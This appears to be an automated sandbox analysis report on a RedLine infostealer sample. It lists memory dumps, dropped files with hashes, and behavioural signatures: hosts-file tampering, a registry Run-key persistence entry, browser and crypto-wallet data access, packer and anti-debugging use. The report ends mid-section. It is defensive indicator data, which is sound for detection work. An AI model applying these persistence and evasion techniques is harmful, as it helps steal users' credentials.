memory/612-234-0x0000000000840000-0x0000000000ACB000-memory.dmp

\Program Files\Google\Chrome\updater.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

memory/1444-236-0x000000013FB60000-0x0000000140D86000-memory.dmp

C:\Program Files\Google\Chrome\updater.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

memory/1708-239-0x000000013FB60000-0x0000000140D86000-memory.dmp

memory/1708-240-0x0000000076E90000-0x0000000077039000-memory.dmp

memory/1708-241-0x000000013FB60000-0x0000000140D86000-memory.dmp

memory/1708-242-0x000000013FB60000-0x0000000140D86000-memory.dmp

memory/1708-243-0x000000013FB60000-0x0000000140D86000-memory.dmp

memory/1708-244-0x000000013FB60000-0x0000000140D86000-memory.dmp

memory/1708-245-0x000000013FB60000-0x0000000140D86000-memory.dmp

memory/1708-246-0x000000013FB60000-0x0000000140D86000-memory.dmp

memory/1708-247-0x000000013FB60000-0x0000000140D86000-memory.dmp

memory/1444-248-0x000000013FB60000-0x0000000140D86000-memory.dmp

\Users\Admin\AppData\Local\Temp\cc.exe

MD5 858f82fe9166c34b6709a3adfe6a625f
SHA1 63275e4b77e0fe6fa6f1db716b5963b69b68f8a5
SHA256 8ec2c1bb10e05a5129269488b53a46c6b5be3691c61ef7da7c6eecf1c0444b28
SHA512 1338082ebb6bf658125cd6d72f5885c78865c1abbed50fd10317dacaf41a450eb98b949631f1a1b94a67d335b23cfc0fa78d0d8db3d726adf2a57af50307b89e

memory/2184-253-0x000000000C1B0000-0x000000000C7E4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cc.exe

MD5 858f82fe9166c34b6709a3adfe6a625f
SHA1 63275e4b77e0fe6fa6f1db716b5963b69b68f8a5
SHA256 8ec2c1bb10e05a5129269488b53a46c6b5be3691c61ef7da7c6eecf1c0444b28
SHA512 1338082ebb6bf658125cd6d72f5885c78865c1abbed50fd10317dacaf41a450eb98b949631f1a1b94a67d335b23cfc0fa78d0d8db3d726adf2a57af50307b89e

memory/1708-257-0x0000000076E90000-0x0000000077039000-memory.dmp

memory/2804-258-0x0000000077080000-0x0000000077082000-memory.dmp

memory/2804-256-0x0000000000090000-0x00000000006C4000-memory.dmp

memory/2804-259-0x0000000000090000-0x00000000006C4000-memory.dmp

memory/2184-260-0x00000000740C0000-0x00000000747AE000-memory.dmp

memory/2804-261-0x00000000007A0000-0x0000000000810000-memory.dmp

memory/2804-262-0x0000000074050000-0x000000007473E000-memory.dmp

memory/2804-263-0x00000000054A0000-0x00000000054E0000-memory.dmp

memory/2804-264-0x0000000002C10000-0x0000000002C7C000-memory.dmp

memory/2804-265-0x00000000054A0000-0x00000000054E0000-memory.dmp

memory/2804-266-0x00000000054A0000-0x00000000054E0000-memory.dmp

memory/2804-267-0x00000000054A0000-0x00000000054E0000-memory.dmp

memory/2804-268-0x0000000005720000-0x00000000057D2000-memory.dmp

memory/2804-269-0x0000000000090000-0x00000000006C4000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\CrashpadMetrics-active.pma

MD5 03c4f648043a88675a920425d824e1b3
SHA1 b98ce64ab5f7a187d19deb8f24ca4ab5d9720a6d
SHA256 f91dbb7c64b4582f529c968c480d2dce1c8727390482f31e4355a27bb3d9b450
SHA512 2473f21cf8747ec981db18fb42726c767bbcca8dd89fd05ffd2d844206a6e86da672967462ac714e6fb43cc84ac35fffcec7ddc43a9357c1f8ed9d14105e9192

C:\Windows\system32\drivers\etc\hosts

MD5 2b19df2da3af86adf584efbddd0d31c0
SHA1 f1738910789e169213611c033d83bc9577373686
SHA256 58868a299c5cf1167ed3fbc570a449ecd696406410b24913ddbd0f06a32595bd
SHA512 4a1831f42a486a0ad2deef3d348e7220209214699504e29fdfeb2a6f7f25ad1d353158cd05778f76ef755e77ccd94ce9b4a7504039e439e4e90fa7cde589daa6

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Local State

MD5 c592149a8506cae8b54a31a52a3ea7ea
SHA1 e833bedc7405e5aceb7b8eac05eee18a36a7dea8
SHA256 991c0fd5fa2c563c05ef16bc24e461cedb7682e4eb42fdb19b5887fed5468709
SHA512 031cdb31524bee3c14e2e5b484ece86e85b4389897924fa272f4e817d286778dc0142235f725255ec79b3f74064a8914528af1c0551b7dea0c86866961947d22

\??\pipe\crashpad_1328_CRMLBDZQUQNOVZXC

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1708-308-0x000000013FB60000-0x0000000140D86000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Local Storage\leveldb\LOG

MD5 8576316b1f156982d22e0c2096e35c4e
SHA1 4dffe4d0777eb25b0c76a6b7b20612f34b8e04f5
SHA256 9a67ddd70766ee4ee31c903eaee8ab93ecbcbcfe4fbe09718dd87d5c3c7c37d1
SHA512 50a0eb3987f6a1a0b06fb70bee1c74f52fcbb27c3bcb876d7cef9df9fb512670014056cc55a1d7e99ef853826c43cbb6cd38a60f147e1163eb62fb9fc6679a35

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Local Storage\leveldb\MANIFEST-000004

MD5 031d6d1e28fe41a9bdcbd8a21da92df1
SHA1 38cee81cb035a60a23d6e045e5d72116f2a58683
SHA256 b51bc53f3c43a5b800a723623c4e56a836367d6e2787c57d71184df5d24151da
SHA512 e994cd3a8ee3e3cf6304c33df5b7d6cc8207e0c08d568925afa9d46d42f6f1a5bdd7261f0fd1fcdf4df1a173ef4e159ee1de8125e54efee488a1220ce85af904

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Local Storage\leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Local Storage\leveldb\LOG.old

MD5 988514fc923d5b8040299ac3a531d24f
SHA1 c998e4171741dcc35f992ba638df1919a2432aef
SHA256 6784fa9f8ca570fde0a41b80513f7b612f6d7729a34cb9f921c9b16ba17f8043
SHA512 34362494a11d96de17e943353d25b7bf0c16a470a588028caa868ae1a2ce3add4d9b2430445266b527fd316c390cee58cd128392f89e95a4545e5d9ee2370c46

memory/2804-333-0x0000000000090000-0x00000000006C4000-memory.dmp

memory/2804-334-0x0000000074050000-0x000000007473E000-memory.dmp

memory/2804-335-0x00000000054A0000-0x00000000054E0000-memory.dmp

memory/2804-336-0x00000000054A0000-0x00000000054E0000-memory.dmp

memory/2804-337-0x00000000054A0000-0x00000000054E0000-memory.dmp

memory/2804-339-0x00000000054A0000-0x00000000054E0000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/776-341-0x0000000019B30000-0x0000000019E12000-memory.dmp

memory/776-342-0x00000000009C0000-0x00000000009C8000-memory.dmp

memory/776-343-0x000007FEF3040000-0x000007FEF39DD000-memory.dmp

memory/776-345-0x0000000000FB0000-0x0000000001030000-memory.dmp

memory/776-347-0x0000000000FB0000-0x0000000001030000-memory.dmp

memory/776-346-0x000007FEF3040000-0x000007FEF39DD000-memory.dmp

memory/776-348-0x0000000000FB0000-0x0000000001030000-memory.dmp

memory/776-350-0x000007FEF3040000-0x000007FEF39DD000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Network\Cookies

MD5 c9ff7748d8fcef4cf84a5501e996a641
SHA1 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA256 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512 d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

C:\Windows\system32\drivers\etc\hosts

MD5 2b19df2da3af86adf584efbddd0d31c0
SHA1 f1738910789e169213611c033d83bc9577373686
SHA256 58868a299c5cf1167ed3fbc570a449ecd696406410b24913ddbd0f06a32595bd
SHA512 4a1831f42a486a0ad2deef3d348e7220209214699504e29fdfeb2a6f7f25ad1d353158cd05778f76ef755e77ccd94ce9b4a7504039e439e4e90fa7cde589daa6

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Session Storage\CURRENT~RFf78516b.TMP

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Program Files\Google\Chrome\updater.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\000002.dbtmp

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\GPUCache\data_0

MD5 cf89d16bb9107c631daabf0c0ee58efb
SHA1 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b
SHA256 d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e
SHA512 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\DawnCache\data_2

MD5 0962291d6d367570bee5454721c17e11
SHA1 59d10a893ef321a706a9255176761366115bedcb
SHA256 ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512 f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\DawnCache\data_3

MD5 41876349cb12d6db992f1309f22df3f0
SHA1 5cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256 e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512 e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Code Cache\js\63f0cac7b2db289e_0

MD5 7ccac6cfefe2c89194d4980c2f786781
SHA1 891d8d807f3fa3f935c1d4cc2d4a6b5804de7dd5
SHA256 7d423afd0c598d7076e8efdb8d187117ebb2e31ed3633fde883eb1154c228e1f
SHA512 999959fa2cadd929abb33ff28bda407b1ca98ceb6eb573e6f03a6652ebff18316f604f28b70d849f013adc63ceb9ef6dc7dcc201e15e3cb7dbafc5bc4688db5b

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Code Cache\js\60ae0d0fe9088cac_0

MD5 0527ab10f1505c9bbd7978acbda59a1f
SHA1 3242274f60455bb80453a88db993e53ae82efca7
SHA256 bbeb8c7ecf1db836c78cc0af18a737f8bbee7f80e2dec65f58e036359577c4e4
SHA512 2146c7ff5551beb8faa06db97a05e18168c8a4515d25e70ab11e7a8bf1abb3ec137cc16945378f451ac07a770560b1913e3fa26c577d21aa824080aa0aaf59b0

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Code Cache\js\5ddeaca7fe64ca95_0

MD5 0bef125af853aedbeb78cf45335d8382
SHA1 904c8edec12bc82075470f80b3863ef95d7f7e52
SHA256 4b32883468368ba511a0511c1d5ebec6fac1dd37597803b8b919d04ba9b64211
SHA512 7e50d48e905caa290f1d5820dcb76aeb5d804a063b2e6cdceed7aafbea0d06299631574556340f270d4002a0a8054d94dacc6156433d706ebd42df6bbb3de952

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Code Cache\js\5b76df05a935e848_0

MD5 221aaf409d24668f2c55042ec34ff10a
SHA1 209eab71b914ea197f0f8b3a1112afe6c467a28a
SHA256 1b4d2ed6796077bc8f88be5447eb6fdd089f546b1a87ffa2ab1cd29014a7b09c
SHA512 4f58cd05df192cb9f2e0569401774ba3e4c20376cdafdd2aa582c132fc30856eccabd3b5ee1da5194189253dff4d9a6e5edf1286aacd56b29866b6caf7171864

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Code Cache\js\343f6993e27f1d39_0

MD5 8716fa41ae795d4d10c0247047db27ed
SHA1 aa03fc534901d83a46198287925836bc3a9d00a6
SHA256 a62edc325d37ca3b3325a01827b62b6287d6285406d15b04670a1bf7d9d2b46a
SHA512 9e6831fd2b08a773a05a3d5a6a2bbb569e3e68aa23353811a00b6ac0ca4f739319f4186987277c87826b4cfe6f30df03e776d3b4247021089934507749bf3741

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Code Cache\js\2e64514b9cd267ab_0

MD5 9f6b9e4baba79efac04082fb9f7f399f
SHA1 a5f67fc0f28330dd35a59d1234c110d8cf7661ed
SHA256 6cce90e30abc17cc9c026c3e6131684d97e504de513a937897a478e4d9495289
SHA512 14e57c7b07404a86a562a6f8d324078861be0406a2ab8d14262e752f8672efb63a1a8b29a340a3d0dabc8a6267f75e14b4914ab46c6c5dd2475aae62ee05e925

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Code Cache\js\17e99028d152eccd_0

MD5 722972bb6837c4a17488cee2566511b7
SHA1 5bff9a3dc24bb052303a3cb27e85195cbfa04d80
SHA256 f4376b3829af4864351c79f4127adedc7d96d6ed42f72c940e159fe47baab63f
SHA512 379132d51d29afeeca5793f0cb01adc5c81bf8377d700a0720081f68f8b81fc28db63334fbd97a9b3631ca33a68cc9fed4bc10dfdbae466fb5f96e49ea5f0527

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Code Cache\js\14f1a0226c118853_0

MD5 f898f9782b16fac8af4cb385030eebc5
SHA1 e8a59a2223487ee96b9f202ef08a54de5249edec
SHA256 cf16aa7a4368f247f041ddcd1005937cc8f68fbf42036a3ed298c27afd3a258d
SHA512 391d65b17dba331c8e3b93552e8347f7b1e32a8b82280a7247c94a7b631ecb64fda770791ec00676e462c81751706f505d745f40df31e484e6881ec86efa951e

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Code Cache\js\06db5837b6c74111_0

MD5 0a1b143305da3626123f024f01f59cfc
SHA1 e784b56d7352384f0f9aca82cf5cfb0d920829fd
SHA256 5acae75fa863c33d46ebdec69fe5270c3181e69675aa653f80350a720f7906bf
SHA512 66c306e863fee8dc3630fd0bb8190562b24e019232cea158df51efc39045c336735bf2ac5b717f33964afac3749e87e70156b612f6b5f9bf14a146d46710755a

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Code Cache\js\056093a36a95204b_0

MD5 dbb07d982334799df12b525570f8f9ef
SHA1 9e0b5ff7e1c5400d97c1cf16f9276c27b48c208b
SHA256 9e9f29a00c4bc8057518d3e2c001747a3338af936aefca7f3ad247095114bb97
SHA512 757e57d0b06e98e203b1d4a8277b8062aa261dd97e3d7ad80e42a274ba41642af6fff40b22a86694e1fe77e2f1a3c013d1c7020ec73620a7e2ce37af0865138f

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Cache\Cache_Data\index

MD5 8301c5aae1eb403047a9b5a7d734e53b
SHA1 b0da8c0a3bb213cf150be88b489b9ffdc60e904a
SHA256 9a3d268b7c839227acc6b4cc8ce59af52bba836d8bab8727ac0886337dfe75d3
SHA512 2841d50dc2ef3515b7680796eb55bfe503797323e08ecab1129e1dbb007011018d93e75c283c4a85dd5a9c519b56d7e557fb43ca4ad809b9a77ef2600c3ff234

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Cache\Cache_Data\f_00000c

MD5 f67dde285de5f831537c104e505e2f05
SHA1 9c967dd7e4b45de90af20983e78cbd315f7cc700
SHA256 918122ce975ea0a50f0da079028f0a059129d7fad0aeb7a4a52a13640a80dcae
SHA512 2762d03ab4e317fc1c08077ecf08e4c8f05be73abd18c441b2e4480b4b177c13f51056fce403997b9337739a1a180d114ddcd223109af815e38e046b9baa7845

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Cache\Cache_Data\f_00000b

MD5 9f1c899a371951195b4dedabf8fc4588
SHA1 7abeeee04287a2633f5d2fa32d09c4c12e76051b
SHA256 ba60b39bc10f6abd7f7a3a2a9bae5c83a0a6f7787e60115d0e8b4e17578c35f7
SHA512 86e75284beaff4727fae0a46bd8c3a8b4a7c95eceaf45845d5c3c2806139d739c983205b9163e515f6158aa7c3c901554109c92a7acc2c0077b1d22c003dba54

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Cache\Cache_Data\f_00000a

MD5 2d52125a96fb5a7227c67848bc18f65c
SHA1 a3593c6d8e3b6b458b6bbc2c6423dc76e30a84a3
SHA256 61f3154c19e46e1989d6fadbfe20835d0c9fc47242dc5828e776e3ec667fda24
SHA512 5f151708007cb474e64e8968b1f6b5e5331c434cc237627c6c5c92d1894d020f476ad88461e35fbf383aa46750a9cdcaf3a2ac8fe90570753c73fcf17ac0cbe6

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Cache\Cache_Data\f_000009

MD5 7d75a9eb3b38b5dd04b8a7ce4f1b87cc
SHA1 68f598c84936c9720c5ffd6685294f5c94000dff
SHA256 6c24799e77b963b00401713a1dbd9cba3a00249b9363e2c194d01b13b8cdb3d7
SHA512 cf0488c34a1af36b1bb854dea2decfc8394f47831b1670cab3eed8291b61188484cc8ab0a726a524ecdd20b71d291bcccbc2ce999fd91662aca63d2d22ed0d9f

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Cache\Cache_Data\f_000008

MD5 c101a8ba729b894927d7d884e4be68a8
SHA1 4bf48f94ff4e50e81c9d83b641af74b3bed580a0
SHA256 544f08482a62485be4acbc443462b01fe16b408b3d154c0cb1ff921a453cee33
SHA512 77483a92abeed799dfb1e782988569875b29eccebfb14e5be353302849ea6f0ac6a6411a72d6da706ec3767a54f12907fd0bfa4646ad4ca1cf4e1e15fbe9a9ed

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Cache\Cache_Data\f_000007

MD5 b1160b640d08bd188b6c5a78ee800615
SHA1 d04fa2c7708eb38571f8e109f4ddbd99d41d2384
SHA256 df0bc11b7504a84666b7b3551505f806fd1b133dc4c5918a0943830c220759e0
SHA512 88a62eade4b9bc3f06d480afc849658abd047e4b54aa8478e273ca27e7d06a111a000c7d93e6f4cc4fc6604abf6d54c6adfdd41c7191ba0c6594c7198c004b17

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Cache\Cache_Data\f_000006

MD5 e91b3d1211e7622f704312f122595075
SHA1 166aa041246e63eea99a3aa76916d2659af597de
SHA256 a0c17c84003fe52ada362e9804f9d2eeb9ec380b4dc0ab3f58534f0bdf2023f2
SHA512 ea4ea36f8e15dc8bf3612fa4ee723ddd7372caefd342540f20cb66343edf8def292d45f70b1da7bd2ec8c389c59af3c1c56ec14baa9b5ea169958eec5bee1009

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Cache\Cache_Data\f_000005

MD5 6a3bb9c5ba28ee73af6c1b53e281b0cf
SHA1 d96e403c99c1707f82ea29c2c1f134e792c64097
SHA256 2f5adfc38558162578ffe112229f10417fbc4b3df025d153d4e22a0c95177740
SHA512 6c4844f70969938339cb6716a834a79e1a8379459c87b983c2518b9cbb560cb2f101aff980f682989928523be6cdc99bde3bfd8137f9c54a58191b900b580fbf

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Cache\Cache_Data\f_000004

MD5 a85760e677d33a66159db7acca59cf1a
SHA1 a88c27ae4a2dcf3078e57258912531287820492d
SHA256 f2b878fa60d99ed05ffa4fd136b2ec173e54b92e6da4bcbdf476b522b237410c
SHA512 f6e588a499d59f00941a48e70d03e232b551355bb7317f48251b49e72f5b1e52102b9e66dc4cc5106b4521673bcd8b404990b276dfaf1a4aa771d125cf5327db

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Cache\Cache_Data\f_000003

MD5 1c50742a09e48311794bfe038c646329
SHA1 815522fb857f2674792b8a52c3f825433f4c51c4
SHA256 7c0ed906abfbc37a694315647ea58a7c76d8eeb04de019ffb5eb31343528624e
SHA512 1a7b722a2c5f74f8031fe8781061d05aa311a9f9eee94d3fbf9a0cf528d5ed6dc77d55d9186f7724791b469fed66a1f2b75b213fec2147925b373deb0cf341e9

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Cache\Cache_Data\f_000002

MD5 21808cd0724524589cd4ec1ce26f6d58
SHA1 fc5cc4cb347ed20389626c58a6de396ef1ac5ada
SHA256 1a7608a326717e18f424991b924d9c7319eb273cc3af432585d95ce8b068ca8d
SHA512 36902ff35a1ed469aa9cab3856b1b0057ca7db8ea4d92ca1d129e68f02eebd5322a4e81aec29a2b1c0c289e2f82df13684ccf0305378878494260c4d4e6caf0d

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Cache\Cache_Data\data_3

MD5 50ea4a0728f24914a8a0e729e71f3377
SHA1 1b0c3e1cedb67885ce55345dc7706d1ffeddf1e7
SHA256 1b27345baf280ed46216cd74deacfa203e33727692ae200ab37150cd7eb15492
SHA512 abb3fd4c0f9e53d707835ac73d56b937166ccb5159efdea26551a9a6c44189ceadafab950572991e3bfaf2f4ed4a8c9f854b74e4aaf4bb4c37534f3fced1743e

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Cache\Cache_Data\data_2

MD5 9985f90c7ea029b33e05ce2b98dc22d5
SHA1 31b2ac4c0c6cbd69e9c22a0dd0f1e10dd8f5ad92
SHA256 10e1b9152bd48922fa4b8e12a380113cf00a489192268d44690b00aff9209055
SHA512 2918307102a1e67c3baaae3bfaf45a5458d48146e48f413a636140ee01a43b2679b09bac2bfbdff78bed3906b1a9580a3520c8b712f20654ac34ac42a167df2f

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Cache\Cache_Data\data_1

MD5 1b56537386dfe598b38e4e056447fa27
SHA1 2f8bd282bb1bbe3c8a34950b9418abc4f5099acf
SHA256 c5df3f53949a69708e74ad5b6065de6ef31cd55856bc8784d2b0cfcb4ffaf3d4
SHA512 f4cb44a22f1c3bd76813a4d040d9a07d326a15c83a14174e2a320af3347aff1c4d64c7d57e5a64f8a3f14a510c13a2fd12614c278c3f4892a85f842bd7a6090d

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\Cache\Cache_Data\data_0

MD5 80f59fb61bb31552a2d5e89a2d8fd9de
SHA1 09c7bbc40e4f3e5033110c5b5cbced77d53266e7
SHA256 1084202df41afa53a135753e89e6e037b94afea9efd482bcb8e8f30560c8bd65
SHA512 efbc221788a65cc61020c8d2b462de1a8f4a1720318a5095f54a91de6aa5b6001d2a3a09879eff0c001d22abe9ea30876e04c1edfd6c24dec14b7eca337ec62a

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Default\chrome_debug.log

MD5 6cbfcb7da474c9ea83374259a938a13a
SHA1 a716e5a7e95ad4e0bd622a01eeff929db5ca13a0
SHA256 ac7a675543cd986674a31db4e927b89f0328d6f59972a2ebdc4cec43bb9a1741
SHA512 48a20c28e58a6dbe2deaf7e33d510fc061fbea7c8179fb2a0ee71058d8730a990789e194a739d36298d288b761b3c8d83ac2ace31a0f5d0500b8544248424c5b

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Crashpad\settings.dat

MD5 bae13055297f9fc295e6bd3485ea2dd6
SHA1 d885bcad4a2ebe9c562ccffde7499fb644ffbd40
SHA256 b759f2cab3a849ac002bd0a9f25e8201e759e64494b675d83ed4690ec30abf9b
SHA512 7883574dca38a0424cb76dfa651ee80ffce2c830f3b47a3debe38853d7de267209914aa1f14398f89128a9af88a6ff6389ee9936df02fa9d77348e6949d8efed

C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\DevToolsActivePort

MD5 9c02a1aec5e58143cdcdc862ce2b0d7c
SHA1 dd489ec0411a1b169f603ae2b548c9bc4173044b
SHA256 55b1ec014f2aa713f99d4e7b1179adf049dfd254ca80a33fc79437789c70cf7e
SHA512 53044ffc914264ae186dc23313eb1fe3033b4f57780767e8a132cd654df85766139ccc7b1d6c5eaa10d0800b6c99da9287889549f5c7b1a1fc3ad0565045f4c0

Analysis: behavioral2

Detonation Overview

Submitted

2023-08-10 18:29

Reported

2023-08-10 18:32

Platform

win10v2004-20230703-en

Max time kernel

145s

Max time network

158s

Command Line

C:\Windows\Explorer.EXE

Signatures

RedLine

infostealer redline

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Windows\Temp\setup.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Program Files\Google\Chrome\updater.exe N/A

Stops running service(s)

evasion

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AppLaunch = "\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe\"" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
